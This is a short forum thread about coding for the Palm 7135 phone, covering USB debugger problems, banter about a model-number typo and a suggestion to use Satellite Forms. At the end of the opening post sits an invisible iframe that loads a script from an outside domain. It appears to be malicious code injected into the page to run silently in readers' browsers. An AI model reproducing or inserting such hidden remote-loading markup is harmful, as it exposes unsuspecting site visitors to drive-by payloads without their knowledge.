+ Reply to Thread

7135 Development

Recently I've been trying to learn how to code for palms(and more specifically the 1735) however I've been having an absolute hell of a time getting anything working. Currently I've just been trying to get the debugger to work over the USB cable, I managed to get it once but recently it just comes up with a black screen on the 1735 and nothing in the debugger. So I'm curious what you guys who write apps for the 1735 do? I'd really not like go through the hassle of getting a rom for the palm emulator when I have a perfectly good phone sitting right here next to me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    maybe you are at the wrong forum, but dont you mean 7135? :drink3

Ah, do you mean the 7135???
    **** Metcalf, aka Rotcod Zzaj
    Perpetrator & Instigator
    Zzaj Productions

If your coding is as accurate as your dyslexia, no wonder your having problems...:p

Yeah, meant 7135, been having alot of un-fun stuff going on so I wasn't typing as good as I normally do.

Hey,

I've been using an app from Puma Technologies called Satellite Forms. This programs lets you make palm apps (mostly form based and database) but it has a very easy to use GUI interface.